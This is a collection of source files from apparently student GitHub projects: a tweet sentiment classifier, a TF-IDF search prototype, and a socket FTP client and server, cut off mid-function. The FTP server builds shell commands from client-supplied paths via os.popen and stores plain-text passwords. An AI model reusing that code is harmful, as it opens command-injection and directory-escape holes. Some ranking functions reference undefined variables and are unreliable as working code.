"text": "from __future__ import division\nimport sys\nimport os\nimport re\nimport numpy as np\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import classification_report\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.preprocessing import scale\nfrom gensim import corpora, models\n\n\ndef wordlist(text, remove_stopwords=True):\n special_chars = \"\"\".,?!:;(){}[]\"\"\"\n for c in special_chars:\n text = text.replace(c, ' %s '%c)\n\n words = text.lower().split()\n return words\n\ndef preprocess(texts):\n list_of_lists = map(wordlist, texts)\n return list_of_lists\n\ndef remove_tuples(tuples_list):\n tupleless = [tup[1] for tup in tuples_list]\n return tupleless\n\n\nnum_topics = 100\n\nX_pos = open(\"data/positive-all\",\"r\").readlines()\nX_neu = open(\"data/neutral-all\",\"r\").readlines()\nX_neg = open(\"data/negative-all\",\"r\").readlines()\n\ny_pos_vec = np.ones(len(X_pos))\ny_neu_vec = np.zeros(len(X_neu))\ny_neg_vec = np.full(len(X_neg),-1)\n\n\ny_all = np.concatenate((y_pos_vec, y_neu_vec, y_neg_vec))\n\nX_processed = preprocess(X_pos+X_neu+X_neg)\ndictionary = corpora.Dictionary(X_processed)\ncorpus = map(dictionary.doc2bow, X_processed)\nlsi = models.LsiModel(corpus, id2word=dictionary, num_topics=num_topics)\n\nX_all = np.zeros((len(X_processed), num_topics))\nX_all_ = map(remove_tuples, lsi[corpus])\n\nfor i,row in enumerate(X_all_):\n for j,col in enumerate(X_all_[i]):\n X_all[i][j] = X_all_[i][j]\n\n\nX_all = scale(X_all)\n\nX_all.dump('models/X_all_lsa')\ny_all.dump('models/y_all_lsa')\nX_train, X_test, y_train, y_test = train_test_split(X_all, y_all, test_size=0.4, random_state=42)\n\nlogit = LogisticRegression(C=0.5)\nclf = logit.fit(X_train, y_train)\npred = clf.predict(X_test)\nprint classification_report(y_test, pred, target_names=['1.','0.','-1.'])\n"
},
{
"alpha_fraction": 0.763610303401947,
"alphanum_fraction": 0.7750716209411621,
"avg_line_length": 21.516128540039062,
"blob_id": "9312248953b47e231b1ff59246fa2d3014a3480e",
"content_id": "1337104c4318b21052dc922098464416dca12484",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 698,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 31,
"path": "/README.md",
"repo_name": "AmitPoonia/tweet-sentiments",
"src_encoding": "UTF-8",
"text": "Twitter Sentiment Analysis\n\n\nThere are three separate scripts:\n\n1) word2vec_sentiment,py uses a pre-trained word2vec model \n\n2) lsa_sentiment.py uses simple bag-of-words model with LSA\n\n3) joint_sentiments.py combines both 1 and 2\n\n\nNotes:\n\n\t- Removing stop-words didn't improve results much\n\n\t- Combining two models improved results slightly but\n\t\tnothing radical\n\n\t- The results are little skewed since no. of samples \n\t\tfor all three classes are not equal.\n\n\n\nAdditional Requirements:\n\n\nThe pre-trained word2vec model is available to download at below link with relevant \nliterature, and once it downloaded it must be placed in 'models/'' sub-directory.\n\n\thttp://www.fredericgodin.com/software/\n"
},
{
"alpha_fraction": 0.4931972920894623,
"alphanum_fraction": 0.6916099786758423,
"avg_line_length": 15.333333015441895,
"blob_id": "529968550d49739fc3cb5a6098c978646aea8549",
"content_id": "c43d2802dd50fd443b1699bee3896fe989ce6be2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 882,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 54,
"path": "/requirements.txt",
"repo_name": "AmitPoonia/tweet-sentiments",
"src_encoding": "UTF-8",
"text": "Cheetah==2.4.4\nCython==0.22\nKeras==0.3.0\nLandscape-Client==14.01\nPAM==0.4.2\nPyYAML==3.10\nPyste==0.9.10\nTheano==0.7.0\nTwisted-Core==13.2.0\nTwisted-Names==13.2.0\nTwisted-Web==13.2.0\napt-xapian-index==0.45\nargparse==1.2.1\nchardet==2.0.1\ncloud-init==0.7.5\ncolorama==0.2.5\nconfigobj==4.7.2\ndecorator==3.4.0\ngyp==0.1\nh5py==2.4.0\nhtml5lib==0.999\nipython==2.3.1\njsonpatch==1.3\njsonpointer==1.0\nleveldb==0.193\nmatplotlib==1.4.2\nmock==1.0.1\nner==0.1\nnetworkx==1.9.1\nnltk==3.1\nnose==1.3.4\nnumpy==1.8.2\noauth==1.0.1\npandas==0.15.2\nprettytable==0.7.2\nprotobuf==2.6.1\npyOpenSSL==0.13\npycurl==7.19.3\npyparsing==2.0.3\npyserial==2.6\npython-apt==0.9.3.5\npython-dateutil==1.5\npython-debian==0.1.21-nmu2ubuntu2\npython-gflags==2.0\npytz==2014.10\nrequests==2.2.1\nscikit-image==0.10.1\nscikit-learn==0.15.2\nsix==1.5.2\nssh-import-id==3.21\nthrift-py==0.9.0\nurllib3==1.7.1\nwsgiref==0.1.2\nzope.interface==4.0.5\n"
}
] | 5 |
ullayne02/API | https://github.com/ullayne02/API | 022346ba5bc368b90dcf2ac68c1e33c61a4b5093 | 4b5764b2b5cc68db20281905e1e4cd624b424ed3 | ff83e84cce44ca23c5acae1a4bb1ceec6cc05033 | refs/heads/master | 2021-08-28T02:27:42.718246 | 2017-11-10T23:20:43 | 2017-11-10T23:20:43 | 110,033,825 | 0 | 0 | null | 2017-11-08T21:42:35 | 2017-11-08T21:42:38 | 2017-12-11T03:29:31 | Python | [
{
"alpha_fraction": 0.6985491514205933,
"alphanum_fraction": 0.7485222816467285,
"avg_line_length": 37,
"blob_id": "614173893fb5cfa827f403f74006d08d6de24d41",
"content_id": "5f1f4f23f5ef6389674ba6f0929164bb45abcb47",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1861,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 49,
"path": "/untagged/ranker/ranking.py",
"repo_name": "ullayne02/API",
"src_encoding": "UTF-8",
"text": "from ..representer import *\nimport math\n\n# function that returns the tdidf weight of a document\ndef weightFileTDIDF(word, text, invertedFile, fileTotalNumber, fileRecoveredNumber):\n tf = len(invertedFile[\"invertedFile\"].get(word,[]))/float(invertedFile[\"size\"])\n idf = math.log(fileTotalNumber/fileRecoveredNumber,10);\n tfidf = tf*idf\n return tfidf\n \n# function that returns the tdidf weight of a query\ndef weightQueryTDIDF(word, query, fileTotalNumber, fileRecoveredNumber):\n tf = query.count(word)/float(len(query))\n idf = math.log(fileTotalNumber/fileRecoveredNumber,10);\n tfidf = tf*idf\n return tfidf\n\n# function that eliminate the duplicates of a query\ndef removeDuplicates(query):\n result = []\n for q in query:\n if q not in result:\n result.append(q)\n return result\n\n# examples to test functions' correctness\n\nword1 = \"cat\"\nword2 = \"bad\"\ntext = \"cat is so cute. cat is bad.\"\n# 012345678901234567890123456\ninvertedFile = {\"size\": 4, \"invertedFile\": {\"bad\":[23],\"cat\":[0,16],\"cute\":[10]}}\nfileTotalNumber = 200\nfileRecoveredNumber = 50\n\nquery = [\"cat\",\"bad\",\"cat\",\"bad\"]\n\ntext2 = \"cat is so cute. cat is sad.\"\n# 012345678901234567890123456\ninvertedFile2 = {\"size\": 4, \"invertedFile\": {\"cat\":[0,16],\"cute\":[10],\"sad\":[23]}}\n\n\nprint (weightFileTDIDF(word1,text,invertedFile,fileTotalNumber,fileRecoveredNumber))\nprint (weightFileTDIDF(word2,text,invertedFile,fileTotalNumber,fileRecoveredNumber))\n#print (vectorFile(query,text,invertedFile,fileTotalNumber,fileRecoveredNumber))\nprint (weightFileTDIDF(word1,text2,invertedFile2,fileTotalNumber,fileRecoveredNumber))\nprint (weightFileTDIDF(word2,text2,invertedFile2,fileTotalNumber,fileRecoveredNumber))\n#print (vectorFile(query,text2,invertedFile2,fileTotalNumber,fileRecoveredNumber))\n#print (vectorQuery(query,fileTotalNumber,fileRecoveredNumber))"
},
{
"alpha_fraction": 0.8125,
"alphanum_fraction": 0.8125,
"avg_line_length": 31,
"blob_id": "8de9ad72062e32ecd7c1d5e189d741b2762b2585",
"content_id": "6cac80ce68daae761c6730ad6db5f4bc067c92c2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 32,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 1,
"path": "/untagged/representer/__init__.py",
"repo_name": "ullayne02/API",
"src_encoding": "UTF-8",
"text": "from .vectorSpaceModel import *\n"
},
{
"alpha_fraction": 0.4000000059604645,
"alphanum_fraction": 0.5090909004211426,
"avg_line_length": 35,
"blob_id": "29a7671e2bdd422416f1e64d969cc3ab92d0c20e",
"content_id": "11728e77fa0efeea617b47593b9240e98bfddab7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 110,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 3,
"path": "/test.py",
"repo_name": "ullayne02/API",
"src_encoding": "UTF-8",
"text": "\nimport json\ndata1 = ([1,2,3], \"id\")\ndata = {\"id\": 4, \"invertedFile\": {\"bad\":[23],\"cat\":[0,16],\"cute\":[10]}}\n\n"
},
{
"alpha_fraction": 0.6697174906730652,
"alphanum_fraction": 0.6995622515678406,
"avg_line_length": 36.50746154785156,
"blob_id": "c7c404ecb63c11258f1d632bda96baf2a9594cde",
"content_id": "140353c0ca8be491fe693a73d43c2a78ea293523",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2513,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 67,
"path": "/untagged/representer/vectorSpaceModel.py",
"repo_name": "ullayne02/API",
"src_encoding": "UTF-8",
"text": "from ..ranker import *\nimport math\nimport json\n# function that returns a vector of a document based on a query \n# a query with duplicate elements will remove the duplicates to build the vector\n# example query = [\"cat\",\"bad\",\"cat\",\"bad\"] will return a vector with two elements like [0.30102999566398114, 0.15051499783199057]\n# because the second \"cat\" and the second \"bad\" will be eliminated\ndef vectorFile(query, text, invertedFile, fileTotalNumber, fileRecoveredNumber):\n query = ranking.removeDuplicates(query)\n for q in query:\n result.append(ranking.weightFileTDIDF(q, text, invertedFile, fileTotalNumber, fileRecoveredNumber))\n return result\n \n# function that returns a vector of a query\n# a query with duplicate elements will remove the duplicates to build the vector\n# example query = [\"cat\",\"bad\",\"cat\",\"bad\"] will return a vector with two elements like [0.30102999566398114, 0.30102999566398114]\n# because the second \"cat\" and the second \"bad\" will be eliminated \ndef vectorQuery(query, fileTotalNumber, fileRecoveredNumber):\n queryM = ranking.removeDuplicates(query)\n for q in queryM:\n result.append(ranking.weightQueryTDIDF(q, query, fileTotalNumber, fileRecoveredNumber))\n return result\n\n\n#this function recives a vector \n#return the vector divided by its norm\ndef cossine (document, query):\n normalizedDoc = normalize(document)\n normalizedQuery = normalize(query)\n for i in range (2):\n result += normalizedDoc[i]*normalizedQuery[i]\n return result\n \n# function that return the size of the vector \ndef norma (vector): \n norma = [x**2 for x in vector]\n norma = sum(norma)\n norma = math.sqrt(norma)\n return norma\n\n# function that return the correspondent vector that has the norma equals to 1\ndef normalize(vector):\n normal = norma(vector)\n result = [x/normal for x in vector]\n return result\n\n# function that gives the similareties between the query and the documents using the cossine as base \ndef similarities (query, documents):\n result = [cossine(query, x) for x in documents]\n return result\n \ndef inverted_file (file, id):\n inv_fil = {}\n result = {}\n file = file.split()\n voc = removeDuplicates(file)\n size = len(file)\n for q in voc:\n result[q] = []\n for q in voc:\n for i in range(size):\n if q == file[i]:\n result[q].append(i)\n inv_fil[id] = result\n with open('data.json', 'a') as outfile:\n json.dump(inv_fil, outfile)\n return inv_fil\n"
},
{
"alpha_fraction": 0.4369521141052246,
"alphanum_fraction": 0.44436952471733093,
"avg_line_length": 23.71666717529297,
"blob_id": "20a4325bee3658aad691380084c75ccb3a9a294f",
"content_id": "e552bf0f76a5a502a7146d1824519ed4c7d0230e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1483,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 60,
"path": "/untagged/lexer/thesaurus.py",
"repo_name": "ullayne02/API",
"src_encoding": "UTF-8",
"text": "import json\n\n\n_ls = []\n_la = []\n\ndef load(word):\n c = word[0]\n path = \"lexer/thesaurus/thesaurus_update/\" + c + \".json\"\n with open(path, 'r') as fileIn:\n syn = json.load(fileIn)\n fileIn.close()\n return syn\n\ndef synonyms(word):\n global _ls\n _ls = []\n \n syn = load(word)\n dWord = syn.get(word)\n if dWord is not None:\n ctxKeys = dWord.keys()\n relev = 3\n while relev > 0:\n for key in ctxKeys:\n dCtx = dWord.get(key)\n if isinstance(dCtx,dict):\n dSyn = dCtx.get(\"synonyms\")\n if dSyn.has_key(str(relev)):\n _ls.extend(dSyn.get(str(relev)))\n else:\n _ls.extend(synonyms(dCtx.encode(\"utf-8\")))\n relev = 0\n relev -= 1\n \n return _ls\n\n\ndef antonyms(word):\n global _la\n _la = []\n \n syn = load(word)\n dWord = syn.get(word)\n if dWord is not None:\n ctxKeys = dWord.keys()\n relev = 3\n while relev > 0:\n for key in ctxKeys:\n dCtx = dWord.get(key)\n if isinstance(dCtx,dict):\n dSyn = dCtx.get(\"antonyms\")\n if dSyn.has_key(str(relev)):\n _la.extend(dSyn.get(str(relev)))\n else:\n _la.extend(antonyms(dCtx.encode(\"utf-8\")))\n relev = 0\n relev -= 1\n \n return _la\n"
},
{
"alpha_fraction": 0.4029850661754608,
"alphanum_fraction": 0.4029850661754608,
"avg_line_length": 28.83333396911621,
"blob_id": "aabde20dfe20cfb50d1006792ce2b7719edb2bf3",
"content_id": "34ce600cf1b8a7b20a17a19dbb379de5871f35ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 536,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 18,
"path": "/untagged/lexer/normalization.py",
"repo_name": "ullayne02/API",
"src_encoding": "UTF-8",
"text": "def tokenize(text):\n tokens = text.split()\n return tokens\n\ndef normalize(text):\n # $, %, #, &, @\n chars = ['!', '\"', '(', ')', '*', '+', ',', '-', '/', \\\n ':', ';', '<', '=', '>', '?', '[', ']', '^', \\\n '_', '`', '{', '|', '}', '~', '\\\\']\n for char in chars:\n text = text.replace(char, ' ')\n text = text.replace('.', '')\n text = text.replace(\"'\", '')\n text = text.lower()\n return text\n\ndef lemmatize(text):\n print('Still not implemented, important to semantic analasys! ;-)')"
},
{
"alpha_fraction": 0.624535322189331,
"alphanum_fraction": 0.6468401551246643,
"avg_line_length": 19.69230842590332,
"blob_id": "116a9aa45c7aaeb96d7929b93d58bbb1056f162e",
"content_id": "bc30fb4bdafcb8a39be45f9700fffe327d9d267e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 269,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 13,
"path": "/main.py",
"repo_name": "ullayne02/API",
"src_encoding": "UTF-8",
"text": "from untagged.representer import vectorSpaceModel\n\n\ndef main(): \n string = \"abc a b c d e f\"\n string2 = \"osdj slajd slkj\"\n #vectorSpaceModel.inverted_file(string, 10)\n vectorSpaceModel.inverted_file(string2, 20)\n \n\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.739130437374115,
"alphanum_fraction": 0.739130437374115,
"avg_line_length": 22,
"blob_id": "3f433db82cea8f467fed972decadd5e3c043f870",
"content_id": "8c1daf2d8483ec6e23ac5a6a8a3e0e4895b0f583",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 23,
"license_type": "no_license",
"max_line_length": 22,
"num_lines": 1,
"path": "/untagged/ranker/__init__.py",
"repo_name": "ullayne02/API",
"src_encoding": "UTF-8",
"text": "from .ranking import *\n"
},
{
"alpha_fraction": 0.3876941502094269,
"alphanum_fraction": 0.40442055463790894,
"avg_line_length": 30.58490562438965,
"blob_id": "a64d5fa43d0ab5643c80c0dc424359a86ab7702c",
"content_id": "4bbe383f5887725048798045efb3efa35af35098",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1674,
"license_type": "no_license",
"max_line_length": 135,
"num_lines": 53,
"path": "/untagged/lexer/mounter.py",
"repo_name": "ullayne02/API",
"src_encoding": "UTF-8",
"text": "import json\n\nls = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'x', 'w', 'y', 'z']\n\nfor carac in ls:\n\n with open(\"lexer/thesaurus/\"+carac+\".json\", 'r') as fileIn:\n thesaurus = json.load(fileIn)\n fileIn.close()\n\n aux = {}\n aux1 = {}\n aux2 = {}\n aux3 = {}\n aux4 = {}\n\n keysWords= thesaurus.keys()\n \n for key in keysWords:\n dictWord = thesaurus.get(key)\n ctxKeys = dictWord.keys()\n \n for key1 in ctxKeys:\n if isinstance(dictWord, dict):\n dictCtx = dictWord.get(key1)\n \n if isinstance(dictCtx, dict): \n ctxKeys = dictCtx.keys()\n \n for key2 in ctxKeys:\n synonyms = dictCtx[key2]\n synonymsKeys = synonyms.keys()\n \n for key3 in synonymsKeys:\n i = synonyms.get(key3)\n aux4.setdefault(i, [])\n aux4[i].append(key3)\n aux3.update({key2:aux4})\n aux4 = {}\n synonyms.clear()\n #print aux2\n aux2.update({key1:aux3})\n aux3 = {}\n dictCtx.clear()\n else:\n aux2.update({key1:dictCtx})\n aux1.update({key:aux2})\n aux2 = {}\n dictWord.clear()\n \n with open(\"lexer/thesaurus/thesaurus_update/\"+carac+\".json\", 'w') as fileOut:\n json.dump(aux1, fileOut)\n fileOut.close()\n"
}
] | 9 |
yyyhhhrrr/ftpserver | https://github.com/yyyhhhrrr/ftpserver | 5220df5d77f950e3ffac74d52b72dbfd00f880a5 | c17c8b3f82353b7b70b916874f359bd9998154a1 | 4204e502c258e1e6f1390239e98220da750ca4a3 | refs/heads/master | 2020-04-06T21:30:06.227132 | 2018-11-16T03:06:30 | 2018-11-16T03:06:30 | 157,805,333 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.35429343581199646,
"alphanum_fraction": 0.3718729019165039,
"avg_line_length": 25.410715103149414,
"blob_id": "f84177c108248f37ba6de93d5c88916107bfa133",
"content_id": "d9fbc790d1350bb0e3bd9cc03a920d30b9c0e902",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 1819,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 56,
"path": "/README.txt",
"repo_name": "yyyhhhrrr/ftpserver",
"src_encoding": "UTF-8",
"text": "基于socket的多用户在线的轻量级ftp server:\n功能:1.用户加密认证\n 2.允许多用户同时登陆\n 3.每个用户都有自己的家目录,且只能访问家目录(权限控制)\n 4.允许用户在ftp server 上切换目录\n 6.允许用户查看当前下目录的文件\n 7.支持上传、下载,保证文件一致性\n 8.文件传输过程显示进度条\n\n|-- ftpserver 轻量级ftp server\n |-- ftp_client ftp客户端(windows 或linux)\n |-- a.txt\n |-- b.txt\n |-- ftp_client.py ftp 主程序\n |-- show_process.py 显示进度条的功能类\n |-- test.py\n |-- __init__.py\n |-- ftp_server ftp 服务端(linux)\n |-- __init__.py\n |-- bin\n | |-- ftp_server.py 启动程序\n | |-- __init__.py\n |-- conf\n | |-- setting.py 配置文件\n | |-- __init__.py\n | |-- __pycache__\n | | |-- setting.cpython-37.pyc\n | | |-- __init__.cpython-37.pyc\n |-- core 核心功能\n | |-- b.txt\n | |-- main.py 程序主入口\n | |-- __init__.py\n | |-- __pycache__\n | | |-- main.cpython-37.pyc\n | | |-- __init__.cpython-37.pyc\n |-- data\n | |-- create_data.py 生成用户json数据\n | |-- yang.txt 用户json数据\n | |-- yhr123.txt\n |-- log\n | |-- __init__.py\n |-- yang 用户家目录\n | |-- a.txt.new\n | |-- b.txt\n | |-- b.txt.new\n | |-- a\n | | |-- 1.txt\n | |-- b\n | | |-- 2.txt\n |-- yhr123 用户家目录\n | |-- 3.txt\n | |-- __init__.py\n | |-- a\n | | |-- 1.txt\n | |-- b\n | | |-- 2.txt\n"
},
{
"alpha_fraction": 0.6829268336296082,
"alphanum_fraction": 0.6878048777580261,
"avg_line_length": 14.692307472229004,
"blob_id": "9661c79c9e2de5f55b308de48cafe1145a5ed748",
"content_id": "fef632c62f99e373a886042643ee31a5f554c386",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 205,
"license_type": "no_license",
"max_line_length": 25,
"num_lines": 13,
"path": "/ftp_server/bin/ftp_server.py",
"repo_name": "yyyhhhrrr/ftpserver",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding:utf-8\n# Author:Yang\n\nimport sys\nfrom conf import setting\nfrom core import main\nBASE_DIR=setting.BASE_DIR\n\nsys.path.append(BASE_DIR)\n\nif __name__=='__main__':\n main.run()\n\n"
},
{
"alpha_fraction": 0.6029411554336548,
"alphanum_fraction": 0.6323529481887817,
"avg_line_length": 23.25,
"blob_id": "07eea750d5e001aa0bb6efe62774b96e4c00a955",
"content_id": "3996ea8d8d1cb6a458042d78ea0e88ceea19d7e8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 680,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 28,
"path": "/ftp_client/test.py",
"repo_name": "yyyhhhrrr/ftpserver",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding:utf-8\n# Author:Yang\n\n# path=\"/root/ftpserver/venv/bin/python\"\n# list=path.split(\"/\")\n# list.remove(list[len(list)-1])\n# print(\"/\".join(list))\nimport sys\ndef show_progress(total, finished, percent):\n progress_mark = \"=\" * int(percent / 2)\n print(\"[%s/%s]%s>%s%s\\r\" % (total, finished, progress_mark, percent,\"%\"))\n sys.stdout.flush()\n if percent == 100:\n print ('\\n')\n\n\ntatal=10000000\nfinished=0\npercent=0\nwhile not finished == tatal:\n finished +=1\n cur_percent=int(float(finished)/tatal *100)\n if cur_percent > percent:\n percent = cur_percent\n show_progress(tatal,finished,percent)\nelse:\n print(\"done\")\n\n"
},
{
"alpha_fraction": 0.4559648334980011,
"alphanum_fraction": 0.4705168902873993,
"avg_line_length": 31.48768424987793,
"blob_id": "dfb1a754ab7dfd830e59e0ae7c4f3a0eaeea3db8",
"content_id": "3d0a459ccc200be104223a26c434031b7a6dd402",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6861,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 203,
"path": "/ftp_client/ftp_client.py",
"repo_name": "yyyhhhrrr/ftpserver",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding:utf-8\n# Author:Yang\n\nimport socket\nimport os\nimport json\nimport hashlib\nimport sys\n\nclass FtpClient(object):\n def __init__(self):\n '''客户端实例'''\n\n self.client = socket.socket()\n def help(self):\n ''' 查看帮助'''\n\n msg = '''\n ls\n pwd\n cd ../..\n get filename\n put filename\n '''\n def connect(self,ip,port):\n '''建立socket连接'''\n\n self.client.connect((ip,port))\n\n def authenticat(self):\n '''登录功能'''\n username=input(\"please input your username:\")\n password=input(\"please input your password:\")\n msg_dic={\n \"username\":username,\n \"password\":password\n }\n self.client.send(json.dumps(msg_dic).encode())\n def interactive(self):\n '''交互功能'''\n\n self.authenticat() # 登录\n server_response=self.client.recv(1024).decode()\n if server_response == \"login success\":\n while True:\n cmd = input(\">>:\")\n if len(cmd) == 0:continue\n cmd_str = cmd.split()[0] # split 后是一个列表形式\n if cmd==\"cd ..\":\n func = getattr(self, \"cmd_cd_back\")\n func(cmd)\n else:\n\n if hasattr(self,\"cmd_%s\"%cmd_str): # 反射\n\n func =getattr(self,\"cmd_%s\"%cmd_str)\n func(cmd)\n else:\n self.help()\n\n\n else:\n print(server_response)\n def cmd_put(self,*args):\n '''上传文件到服务端功能'''\n\n\n cmd_split = args[0].split() # 获取输入的命令转换为列表形式\n if len(cmd_split) >1:\n filename = cmd_split[1]\n if os.path.isfile(filename): # 判断文件是否存在\n filesize = os.stat(filename).st_size # 文件大小\n msg_dic ={\n \"action\":\"put\",\n \"filename\":filename,\n \"size\":filesize,\n \"overridden\":True\n }\n self.client.send(json.dumps(msg_dic).encode()) # 字典转json 再转byte\n # 防止黏包,等服务器确认\n server_response = self.client.recv(1024)\n # 可以写标准请求码\n # .....\n f = open(filename,\"rb\")\n m = hashlib.md5()\n persent=0\n for line in f:\n m.update(line)\n self.client.send(line)\n send_size=len(line)\n cur_percent = int(float(send_size) / filesize * 100)\n if cur_percent > persent:\n persent = cur_percent\n self.show_progress(filesize, send_size, persent)\n\n else: # for/else 当for执行完毕走else,如果for break了就不走else\n print(\"file put success...\")\n file_md5=m.hexdigest()\n # print(file_md5)\n self.client.send(file_md5.encode())\n f.close()\n else:\n print(filename,\"is not exist\")\n else:\n print(\"put need 1 argument at least such as filename\")\n def cmd_get(self,*args):\n '''下载服务端文件功能'''\n\n\n cmd_split = args[0].split()\n if len(cmd_split)>1:\n filename = cmd_split[1]\n msg_dic={\n \"action\":\"get\",\n \"filename\":filename,\n \"overridden\":True\n }\n self.client.send(json.dumps(msg_dic).encode())\n server_response=self.client.recv(1024)\n if server_response != b\"FileNotFound\":\n if os.path.isfile(filename):\n f = open(filename + \".new\", \"wb\")\n else:\n f = open(filename, \"wb\")\n m=hashlib.md5()\n self.client.send(b\"200 OK\") # 客户端发送可以传输信号给服务端\n filesize=int(server_response.decode())\n reseived_size=0\n persent=0\n while reseived_size<filesize:\n if filesize-reseived_size>1024:\n size=1024\n else:\n size=filesize-reseived_size\n data=self.client.recv(size)\n f.write(data)\n m.update(data)\n reseived_size+=len(data)\n cur_percent = int(float(reseived_size)/filesize *100)\n if cur_percent > persent:\n persent=cur_percent\n self.show_progress(filesize,reseived_size,persent)\n\n else:\n print(\"file [%s] has uloaded...\"%filename)\n f.close()\n file_md5=m.hexdigest()\n server_file_md5=self.client.recv(1024).decode()\n if file_md5 == server_file_md5:\n print(\"server file's md5 is the same as server file's md5:uploading success!!\")\n else:\n print(\"md5 is different with client file's md5:uploading failed..\")\n else:\n print(\"file [%s] is not exist in server\"%filename)\n else:\n print(\"get need 1 argument at least such as filename\")\n\n def cmd_ls(self,*args):\n msg_dic={\n \"action\":\"ls\"\n\n }\n self.client.send(json.dumps(msg_dic).encode())\n server_response=self.client.recv(1024).decode()\n print(server_response)\n def cmd_pwd(self,*args):\n msg_dic={\n \"action\":\"pwd\"\n }\n self.client.send(json.dumps(msg_dic).encode())\n server_response=self.client.recv(1024).decode()\n print(server_response)\n\n def cmd_cd(self,*args):\n cmd_split=args[0].split()\n cd_dir=cmd_split[1]\n msg_dic={\n \"action\":\"cd\",\n \"cd_dir\":cd_dir\n }\n self.client.send(json.dumps(msg_dic).encode())\n server_response = self.client.recv(1024).decode()\n print(server_response)\n def cmd_cd_back(self,*args):\n msg_dic={\n \"action\":\"cd_back\"\n }\n self.client.send(json.dumps(msg_dic).encode())\n server_response = self.client.recv(1024).decode()\n print(server_response)\n\n def show_progress(self,total, finished, percent):\n '''进度条'''\n progress_mark = \"=\" * int(percent / 2)\n print(\"[%s/%s]%s>%s%s\\r\" % (total, finished, progress_mark, percent, \"%\"))\n sys.stdout.flush()\n if percent == 100:\n print('\\n')\n\nftp =FtpClient()\nftp.connect(\"172.16.95.131\",9999)\nftp.interactive()\n\n\n"
},
{
"alpha_fraction": 0.5052686333656311,
"alphanum_fraction": 0.5164967775344849,
"avg_line_length": 30.467391967773438,
"blob_id": "43e6b3c1f3876b26bcf829ea0dc6a364596022ff",
"content_id": "b59a71c4a76fa8e0ae04639c5751300832b615c0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5973,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 184,
"path": "/ftp_server/core/main.py",
"repo_name": "yyyhhhrrr/ftpserver",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding:utf-8\n# Author:Yang\n\nimport socketserver\nimport json\nimport os\nimport hashlib\nfrom conf import setting\n\nclass MyTCPHandler(socketserver.BaseRequestHandler):\n\n def authenticat(self,*args):\n '''服务端登录验证'''\n user_dic =args[0]\n username =user_dic['username']\n password =user_dic['password']\n try:\n with open(setting.BASE_DIR+\"/data/%s.txt\"%username,\"r\") as f:\n data=json.loads(f.read())\n\n f.close()\n user_dir=data['user_dir']\n if data['username'] == username:\n if data['password'] == password: \n self.request.send(b\"login success\")\n return True,user_dir\n else:\n self.request.send(b\"error password\")\n print(\"username:%s login failed:error password\"%username)\n return False,None\n except FileNotFoundError as e:\n print(\"error username:\",username)\n self.request.send(b\"error username\")\n return False,None\n\n\n def ls(self,*args):\n ''' 查看当前目录下文件'''\n cmd_dic=args[0]\n user_dir=cmd_dic[\"user_dir\"]\n print(user_dir)\n msg = os.popen(\"ls \"+user_dir).read()\n self.request.send(msg.encode())\n return user_dir\n\n def pwd(self,*args):\n '''查看当前位置'''\n cmd_dic=args[0]\n user_dir=cmd_dic[\"user_dir\"]\n msg = os.popen(\"cd \"+user_dir+\";pwd\").read()\n self.request.send(msg.encode())\n print(user_dir)\n return user_dir\n\n def cd(self,*args):\n '''cd'''\n cmd_dic=args[0]\n user_dir=cmd_dic[\"user_dir\"]\n cd_dir=cmd_dic[\"cd_dir\"]\n user_dir=user_dir+\"/\"+cd_dir\n msg=\"the current dir is %s\"%user_dir\n print(user_dir)\n self.request.send(msg.encode())\n return user_dir\n\n def cd_back(self,*args):\n '''cd ..'''\n cmd_dic=args[0]\n username=args[1]\n user_dir=cmd_dic[\"user_dir\"]\n if user_dir == \"/root/ftpserver/ftp_server/%s\"%username:\n msg=\"this is already in home\"\n print(msg)\n self.request.send(msg.encode())\n else:\n list=user_dir.split(\"/\")\n list.remove(list[len(list)-1])\n 